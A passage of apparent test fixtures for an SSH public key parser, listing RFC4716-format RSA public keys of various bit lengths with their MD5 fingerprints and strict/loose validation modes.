/5d9whBZzr8uaFaM7f20nhAgzIki7XSKlN0/a/nw8WUlQMbMx\n98n5LY0whtmj429k8zAI8jEIrVyCQjzEss2FKIuw836acH+XF/e501UGlIAoFvj4/OBKfx\n/+L68ujo7PUDPcuFlu8mZ2I6tohHKriJYeZcRryeT/zXpQs28AN1QWDfFDNSQGFkrUoLuM\nUYSjMx0ftb6LDw/Ilaz3/zJzz4PtECutPgKtrtqYxYyDVHbyn6fBiECtHnSXd3b9dp3iFI\n4t8VBFOEIcX01Mdgjvum5Pb6KxJf58pcUBQUeI+Bg1aHR+ojh5ZeqEYFr2ojdSD/0WehwU\nPF8IGCPVCaTKksh2yPyR174LDD05UoWvm8hc1CLhuuASq6xPrAXhcZlEl7zTJXWKD356j9\nOvLItEFQqolsIhS2m/W8pWzCPtY9je3bWyB+vzN3BquSuLoriIcZrF7FL7f+ZVGQDmNhIK\nGalojIOlzyRIHXKEV89gQHU88lWWAEc0MNP80Ag0/avrp35myUbWoP4Elkm3UjUvZHWOiW\nCDABEoaGlnexVgtQctJ42ZnQIztGp+hvgmezJWtqKrtfiIW6G2N+3O2pLoDubejswrG9k7\nOhtK358XF1YOxzIGyFPTvEODhe0Zv9\n---- END SSH2 PUBLIC KEY ----\n',
16383,
'MD5:b6:ff:d9:90:61:a7:73:77:49:cc:b1:41:ca:c1:3b:a5',
None,
'valid_rsa_16383_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "16384-bit RSA, converted by ojarva from Op"\n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\nkl5ZEGBbiRf3+EQZgBpYhQiyZ6Oq7hlQ==\n---- END SSH2 PUBLIC KEY ----\n',
16384,
'MD5:0e:e0:bd:c7:2d:1f:69:49:94:44:91:f1:19:fd:35:f3',
None,
'valid_rsa_16384_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "768-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYQCxO38tKAJXIs9ivPxt7AYdfybgtAR1ow3Qkb9GPQ\n6wkFHQqcFDe6faKCxH6iDRteo4D8L8BxwzN42uZSB0nfmjkIxFTcEU3mFSXEbWByg78aod\ndMrAAjatyrhH1pON6P0=\n---- END SSH2 PUBLIC KEY ----\n',
768,
'MD5:56:84:1e:90:08:3b:60:c7:29:70:5f:5e:25:a6:3b:86',
None,
'valid_rsa_768_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "771-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYQbdtLTII+vP98NSDlK2LXxVARELRYO0NODFYQ0imY\nxsmBMB7BrfljFppLJyjU6cziOT6YFj6rVd8MmCogdCR32u63EV11uT6RCFfJMQJtIi+B1J\nJipTxLzURsiUOOgAHJc=\n---- END SSH2 PUBLIC KEY ----\n',
771,
'MD5:29:01:ab:68:09:69:02:57:86:ea:f2:76:4b:2f:ef:f8',
None,
'valid_rsa_771_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "780-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYgpPyLrc+NDQJjf4B1jVA/eTaOzpDqmjM/oFKQEq+H\neSFxqFS3Fe7kLIfvdClVyYshg3qz1OfH+mCkcqLX5CPhdZZZbDxAbowAfPmBF77qeQqOsq\nNhIO0tQ6NX00PNmp5sLL\n---- END SSH2 PUBLIC KEY ----\n',
780,
'MD5:86:0a:3f:a5:aa:3b:c1:6c:50:86:dd:4c:86:d9:6f:18',
None,
'valid_rsa_780_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "783-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYnE55Aie+1J73DhvqOgyOf+hRMRI9+qoCRhIX6/xGi\njmrWBKhax0CKQ/E4HDyoviUbd/Q4jPNnpjA9lJWLDh23auSUPQMl4xBuUxzaJh1G+HFYJH\n0HA9/ONFb6oQd0J8StuJ\n---- END SSH2 PUBLIC KEY ----\n',
783,
'MD5:b6:6f:95:a1:f2:e4:de:ac:9d:22:e9:70:40:80:3d:22',
None,
'valid_rsa_783_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "786-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYwNgeGM0y1gmTC5yGLpiL2TF56l+ynG+9OcoonNsXt\n/mnAOpH7KbVnA7utELLidfS6oenKBWMJlbMmMeM+/7mEcKoF0TUAtdaJvtawLmUKHdAZNv\n0qZhrKN0L/OZAvkn5u2urw==\n---- END SSH2 PUBLIC KEY ----\n',
786,
'MD5:d2:e4:db:9f:c1:3f:7f:ab:09:a8:ef:b8:0d:0e:4c:e9',
None,
'valid_rsa_786_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "789-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYx1UtgIDIf1tpk4ro2r7ethUFwrL94KhffPD6E0Z5U\n5dC8ZCjblTauZSmhztVYMh/8nhU/ArP/zy208d32mMxTklxnx/tFulwtDXaH13A8EdCNdB\nzUG+wQ75O0kQVUMpp/rVnQ==\n---- END SSH2 PUBLIC KEY ----\n',
789,
'MD5:ef:32:28:eb:3f:2a:a1:bf:34:d1:26:bd:8c:6f:c0:c2',
None,
'valid_rsa_789_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "792-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZADu5iFbDQWHggy7d1kKkc6RVkNkiRjOwT1dbghPz1\nlWX3HK/iGFoMySTB1iviwoufHNAPS75WJeC1nfZBEkrIW16SrwsfLtuKMwjz+8Sb2ENtC7\ntyLB8IG77/ewRDEwOGiu8pc=\n---- END SSH2 PUBLIC KEY ----\n',
792,
'MD5:b1:aa:90:f3:76:8b:46:a9:0e:3b:e7:e6:1f:dd:30:e8',
None,
'valid_rsa_792_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "804-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZQ8rZh7qsWG7dcZ+Gs6yg0AAJyjJhkzYG4qmG5HkS6\nim0D5H1jk9FZCAdZpJdQc8oBUGBDRe1xtorY4GsxS+Bdk5BoiGMwr7yWKjFy0Ert6MUG7Q\nUAknM3nLZKWm4MZvPRToHGjr\n---- END SSH2 PUBLIC KEY ----\n',
804,
'MD5:22:09:eb:fe:94:a5:3d:58:b0:23:ea:42:0b:a2:3b:6c',
None,
'valid_rsa_804_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "807-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZW0CyFwCSXjZ/FJ1RuqkgBeLgTBJ3hk/OTn0pI8g9c\nr9r5EFlYT8/ZXd1ilP5rSknba1g9FudG8eCH7Ah+cnbFbzPJNH6Aofga9hh4fewKo+KI0S\n65H+XgBJsp+xEZnLPCIqhzkF\n---- END SSH2 PUBLIC KEY ----\n',
807,
'MD5:28:ce:cf:1c:54:2d:c2:26:d6:b4:9c:7a:9f:fa:d8:1a',
None,
'valid_rsa_807_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "810-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZgKVmEp6e8BmGxLrfBE+bzMog35mZ70vTurSwKZ+PE\n2eo4/h2xLXC0/O6tFItgukF2oG75Hkx0CrLwbSBYeaYVtYCp7dWiDQpS8Ribq5zRHl0tz+\n9DBioHSIAkNJ6Xesy6y+5oZHiQ==\n---- END SSH2 PUBLIC KEY ----\n',
810,
'MD5:d1:21:8b:4d:84:6b:cd:8c:4e:d8:b5:92:ef:75:76:d0',
None,
'valid_rsa_810_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "813-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZhnHxufkUNVz7fITzsow1EFbxdCH7GB8BaT5fUESJD\n3TYKaCbHefxrDU6UYAgaEKnXVmd5tE3D2qZ8Z33ECEuQHHIoSicB5VIG+zNwOLve8/ftFj\nippwnSe89g/1Lu/qXVzsGCCvTw==\n---- END SSH2 PUBLIC KEY ----\n',
813,
'MD5:7e:9a:26:2b:77:54:d1:24:54:a7:e7:05:41:be:bb:7e',
None,
'valid_rsa_813_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1299-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAAowYV74xpHjU/esNFWOAZvh3JiHlPgmeIFPBeKiZsP2\nOS/yxulMs/MbM6Cc0Q0GFhF3ycNu6rsjQHuoLbFxcrRA4reBDU+BFA9YeG9ptdpBW2rjl+\n/MjPML2cmIiF9VOuwia8WWLH/gro/AECoEiAbKUJcbD8PdGfZpb/QZyGl+5WpoKW3OD9PT\nDJmI6to2lp+NNx2bvV08sb2z8zVJXLgBrQ0Vc=\n---- END SSH2 PUBLIC KEY ----\n',
1299,
'MD5:40:fa:26:65:60:fd:62:ee:03:70:bf:db:15:53:78:bf',
None,
'valid_rsa_1299_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1302-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAAoyx+ox9qPgBMrRireysGh3SOuMj9rPXgPIgTRCH4Yg\nHJavaIKNE3l+FPYT2r4ri2Ej5kIN351muDMaaiT8dqWWcOSoFFNPv1DZ75iVBBvQBhAgP2\nkllbzI4/e0qqc0BGBW2c19rTIQK2uSfFCTcVaIJQooM6knKYUPWNUJWc4C+/NYD7hRp9s1\nMXgMO6F1ajJKD+z51zoFXcMZKb3yODguWSU90=\n---- END SSH2 PUBLIC KEY ----\n',
1302,
'MD5:96:b3:a5:61:3d:8d:86:2b:ee:94:dd:e8:e3:6a:26:03',
None,
'valid_rsa_1302_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1305-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApAGFxZYSi3pcajPO4+bBOc0lKv9NzuIB2CcY8HdZEQ\ne0QGbbu/saDgFuMLirBlZrkldSRdFgCVpTVScxbABvX0Cx7sPNwPag8QTsgI/phQivCGx2\nU7/2jsJDcfCj1uHGnTKWh8b4wNto0lpaeo0aSMZfymgjDEkgxpWBhJMgkWwlOP3hWSXl43\nmO0bcfHoyuDHccbmwztExuQ2ImpkJaDOVrom9f\n---- END SSH2 PUBLIC KEY ----\n',
1305,
'MD5:12:a1:ab:e8:fc:ca:e1:21:a7:06:86:e7:7a:fd:10:ca',
None,
'valid_rsa_1305_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1308-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApAxM2gGIaiwCkuzBjFsmgh0GEmwmf/5+dxm9HWz2PU\nsG8utJN1mCyLWkuWhwBiOnttvKIvfKbmr8KAIvwGUOQyMjE8Xi2JuMl4Vc3HvVGbeNQXhw\ngyXsE7ykjHZioddaOwv87j+SzDlP1As2hq9VOtTByIrqo7Qn/OCDJI0z6fBhtbtjFTjdBB\n7ViSfKw8TEgexSyIPxTe74RQjmalA9UEXyUHlx\n---- END SSH2 PUBLIC KEY ----\n',
1308,
'MD5:ef:51:09:9b:4e:b5:3a:15:05:19:15:68:66:c3:bb:16',
None,
'valid_rsa_1308_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1311-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApFgBPZxYXC1JXtkOO6irCMCmoz+jzWg5GLqd0V2rZA\npdQ16JrsX/DTO9V5NTCiLQbN1UqW8EuJXLKNyzZefh9EdzwciOzIPIyFqPsklNKWhWeX31\n1jMUmbCS7M9+Pxi/wQ3FG2uxycb8ZX8THI7T5L1QvyJivxGPxZAQXpVZvD9j0zalCyVdkF\nDRJCE3jkK2jGyu2RFZT6NZEo9qpqo8H7f1L6q5\n---- END SSH2 PUBLIC KEY ----\n',
1311,
'MD5:fb:ff:40:35:e5:78:e9:03:f8:d2:c1:71:39:82:3b:fc',
None,
'valid_rsa_1311_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1314-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApQOZtuX6wLBkB2f9hm4iCbJwhteR1+o3+dfxb5lWE8\nf3GOld2b/up8vd+GLMM6kHhkfUhpPNdJ0PfSu8L/p51MPq0PfrD1IhO9u7d/U4Tebyy6Uz\nRPsPo6j38cU7rcIqHZwDiGCon9VO4x3WF58l2WJ0P/UcnLYVjC/jXioQBF1la7IPs3H4g+\n+jy/9oQNn4/NH8/Lk5oTUF9aHOtsauCxrqzGGCQQ==\n---- END SSH2 PUBLIC KEY ----\n',
1314,
'MD5:7b:49:e3:c5:53:89:b5:30:5f:0a:f0:5f:12:9d:92:95',
None,
'valid_rsa_1314_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1317-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApRS5H4cONMXNAgn+CmPJXaTyZI+R9jai89ATYSUuBJ\nVVI5MOVBoRTYzZISi/nMDdsH0D14zlOsmc+5+aHCAkFlBOSag23xHj3gfPsLcs6AjX/irv\nhjBoj7bOSI1Tzxggc+S1sOd4WmZo9jLpxXQ0H1Md7ic5rFg/oU2qA8TuCm1jBUpviTL3xM\n/fNraLnIUcPWG8o4LJL71YZc6quWXjNEmK7u0kYQ==\n---- END SSH2 PUBLIC KEY ----\n',
1317,
'MD5:41:6d:91:da:82:7f:b3:5b:e3:b1:6d:4a:23:8e:7d:b7',
None,
'valid_rsa_1317_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1320-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApgDURQ01EZNnjdCKce3/28LbXfLwQtaS+k7TK/jRik\nonejiiN7MXaayqahhNry/Edzf2/WJSOnBbBdhgLxhBgPJy8Yk/koaD6DmjnJ0Hrl+s1RBU\nAGsW2Da9/b9VIYkPbPJ6UwiTDB1SPF6jINqW7mLvOxt9onJwz95uct1udwk8XHp709vv6b\nRn5xpq26BukOvBxhu3KX8h68txqSDFmH6haEzjXoU=\n---- END SSH2 PUBLIC KEY ----\n',
1320,
'MD5:27:33:d2:ae:58:fc:b8:4f:41:36:de:24:ba:2d:3f:c9',
None,
'valid_rsa_1320_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1323-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApgYP1GJHBP+AnJiU4AQITNotMWbxM41bTVwrYC4UAW\nmgm/v8F8U5R+HHWcwyPahNt7vVJ4fw8MshVLNVcGf598F1vEJuKvKMuPQjetJcGxfSA/g5\nby/aPIdzstUUp8afsFOyEJOAf23pdw5k6QmyPPbAg8/zGoZkZ3lbnnr9gAOK5iSuwW4Zju\n/LTPDuu89cBrvlFr05xpxVArh6H0gRo18T2xjz/z8=\n---- END SSH2 PUBLIC KEY ----\n',
1323,
'MD5:c1:82:87:db:76:e4:2b:b1:b0:7a:c3:a2:a4:da:75:45',
None,
'valid_rsa_1323_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1326-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApic5f0WgrxUGHUSG1he6A6CVjBbjWrckrMliNhHo5m\n38Q+TmALI+4ktbtDG61Y58SGVXaBvFnlkba6PsBfq0dudJn6zhcWohOCX2jwJAdUOhPuVf\nL6e4fNLfJmnyeIGS9vtXSkk/PYXshkEPq/UerOlpAS+jxZnXPZnnpIHrX/NvMarLKLA/f6\nuaDfF3jIl7TxT4I1Bhn9KtlBZOzrC2sTsnnkcWiVE=\n---- END SSH2 PUBLIC KEY ----\n',
1326,
'MD5:f9:3d:7a:eb:a8:b5:0b:f3:f1:1d:c0:fa:3e:c2:0e:8e',
None,
'valid_rsa_1326_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1329-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApwGHoGv4qz/U0A5j/wuDQzq9GtQEQv6Z0cs03/cBb8\nJLmj+xnZIlM7dgzvxfSmutjR0m5E+rbUuRYNoYpeVZtaD8r5h3Dj2bvWnmf2U0vReHZhH9\njuEdOrVDuZtXU4SkRo1P3f5HuVeo6D5U1gkSg2YUpYpGE3Y+nhEWmiZrBcns8Yw1z72rva\neCjRwzyZgSpyVRQOXygmiOP/3GIfb8zNChd3qWJtlP\n---- END SSH2 PUBLIC KEY ----\n',
1329,
'MD5:89:2c:f6:06:f8:5e:f3:bb:cd:28:33:4b:0a:6d:10:ed',
None,
'valid_rsa_1329_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1332-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApwraDBOJz0St0svlhB7cN7Cy67vH5/X9jvyMMIeHH/\nzNAR89TyWRLWkARidtqOIqgyPzRj2nCSm5ISu2T+/DHNZcP0shhcRoKLh52otz+gJatyvs\nYL1w4ZW6P1h8U6Faf2DbxsUcfIYVx3K2O4V1m/8+aDQjFIW4a0bARU9liu3Z1LB9f6NwS6\nZEcHb8dlo+3lsnkjVFR6Xl1zzs86pPBGJRA0HYf2yB\n---- END SSH2 PUBLIC KEY ----\n',
1332,
'MD5:16:69:3d:b8:cd:a0:78:8d:7b:0b:0e:99:24:c1:d1:4e',
None,
'valid_rsa_1332_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1611-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAAygXJwDBDbv4+4J+zx90C9wUmXaXKiCvQf4LG08Rp6N\nXjWPCGFEclp3MP1apbEVzrSYwEFHFtEODwAdT6SdZWzrOu0pi/ee4E+5oBNoxsRq7Ggk7q\n/YH7I/rPv/av3nz3M7he6AC1Urn9iDtgg2kRrG93iD5bBngq9mBa2XRWykF3LfSIR6UcCW\nlhvNMlhQ6HX+h5jwe2Ali+zCArVYK4OwIDDRRN1vQpFa41wnadwz7jYRtUU6rb0HOpknzV\nVLLEMA9hesdv7IfmA/k=\n---- END SSH2 PUBLIC KEY ----\n',
1611,
'MD5:ff:ac:71:02:fe:38:a0:c8:58:4c:06:6d:cc:ee:e7:0d',
None,
'valid_rsa_1611_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2013-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/Bg4DNQh1RFnvgCi0Q3vCrUYBB6oZufUK7AXrtFRD+\n8n/QRvQnQPE59tQHlQ8FvLbVq/uqj/HzO9iRWlqP05/GB4byZWwk1vDfGFqOL/5rTUdcdo\nkRcy2zzGIWWzbhUbnoKNWpr7f/nRBzTvvcUVlAJTTITjd+87cb/Gr74GQIhM7Ao7tv7qE+\nqVtCWj9G4i4ojmfAMoWIGMRRbAkr7MdnAIV7UVwC8AN/gz8zIYhutHX3p9SxWy5V0UgQjV\nwJh5Vb72pndUmJXmjUyzuZXqxAOFtfXge0WwCMRd/bDcBPILaa33KxlHc48IpS351pVeka\nS1KsheVBzus00S6w==\n---- END SSH2 PUBLIC KEY ----\n',
2013,
'MD5:a8:9c:d3:a5:97:65:61:39:a8:98:e6:59:bc:f8:f2:06',
None,
'valid_rsa_2013_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2016-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/QD1WMI5FCXEgGSYPVJkDexjZMU9OqokStDg8LL5gu\nY+b9EECEJ4xWMnGFC8CbyMDHmUQiYRpbh8bUzU8uLt0wLrEn15yc5R3F3BCX1kdjlKcLpo\nQryHvL2aJNNv02atgJ2os9QSsY8O6yOoPlSC/vmGurHPrtoL7sRVUPcHtPU5QlqvkbdFAm\n0dQ0BrGE6SH9Ia7cv3f9ky0WexFrdmxTiMK8gT1ZkhIlM2iQVct/pz1R4VL+GXU2ia5CHp\nl8Ag4NrIw+O0Y1VfakOtXMfr2RhbS8DZDKvVaJVveoqv9LQe8Nq+uPu0A+KY1KVHbZyvlS\nsoH7NKkbF4SRYzK9U=\n---- END SSH2 PUBLIC KEY ----\n',
2016,
'MD5:e2:33:6d:69:a8:4e:fd:52:15:7a:6b:a9:8a:3e:63:00',
None,
'valid_rsa_2016_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2019-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/QYQGpPpfnSgFbyZx3klNz4FyTCdDY7bq1fwRsP7wr\ng7yfX7IimAdDcTcoVyd6JEaYqlNCtK9ClTwSmuVVpmS6p/834DQtzOhvxs7u3cti4buYX7\nmLfnmAfLI80eeFGXGr1K2owsFEHbEAJTG007BvcezM4V7l54iniTGCoxrvbHrp3Puc46gm\nGEo6J2bDDYXKD9xmuVL0XrUYqvR34fVswMABSlNN9ROdxCI5jxKhuOrL0sZg/faf+973Cf\nJWPfFGPkOaINSpUgBDKVTRwWL86IjIEnDdiIyNAxAnbZOyGAMO0+0iyWOBso7QxFt7UoYi\n/C803I1BCGbXqCAGs=\n---- END SSH2 PUBLIC KEY ----\n',
2019,
'MD5:e4:a5:13:0a:bb:06:02:34:68:1d:2a:69:6e:b2:82:0d',
None,
'valid_rsa_2019_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2022-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/TDTpJy8OjtlM9F+UClxMF4XFN/LRh63c2JgBVquLm\n9pevlsRRsN3MUk+N5b6hDcluKYOI5loOyXTuPkuGYdxowuTOkS3sdp7zZAhkeRW/g8ChnO\neiNWkGwR6vCbJh2Kbhvn3QG/fZgG5E0hRfqn8hfShNsWZeH5m7eiurwL30a7Mx+m9OsdEE\nea91wQckGAskA7nz2nLzEL5J7eVK4c+gMKsyLDB8R9w1oYsbsUPfbv+7tDNwg+Ur03nXJ2\n31oHog3LLLSixvC24272ZJ14v8DFQnDcDzQDrrmoXdkRNrMsXIGaf/J9VFk49oJ7NHJzGv\nhNUeuGwuhrx7bs2aU=\n---- END SSH2 PUBLIC KEY ----\n',
2022,
'MD5:20:94:06:c0:3a:81:02:c1:bf:39:a8:1c:07:4d:db:3c',
None,
'valid_rsa_2022_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2025-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/gFaVjuZJF8V5h/F3aJ/fs2MINAuoJH+VfqJb1rhsX\nljXV0XOEyHo7XyiZX7KVQ2AFB7ZWmtVjDu5wGgU6zKfvfoytbPPlYwaGf7RikRGdCWvsJn\nwB9PChAV9WsDqe4NODzaFIv/tiAUsy5CChkESIJeNLK2K/KQtEWSmu57hsr8terigCufSY\nt2YjKcKErIbRNVwu2SqfHSjPKRXzmjTbDpUpvCY3nU3kWJmhsZHPNz5J8z7xV5NSJPgjWM\nToKi+st9XJI/t7zYWrdwx4DCEjvKdGBKf3BklYrqx1c+vWhwclNyUd+zquGmhUTvsReI0A\n0e1o5mPM/n/uU0fyJ/\n---- END SSH2 PUBLIC KEY ----\n',
2025,
'MD5:60:95:d4:ec:69:ff:a6:1d:c7:dc:fa:fc:9c:45:b1:23',
None,
'valid_rsa_2025_rfc4716', ["strict", "loose"]],
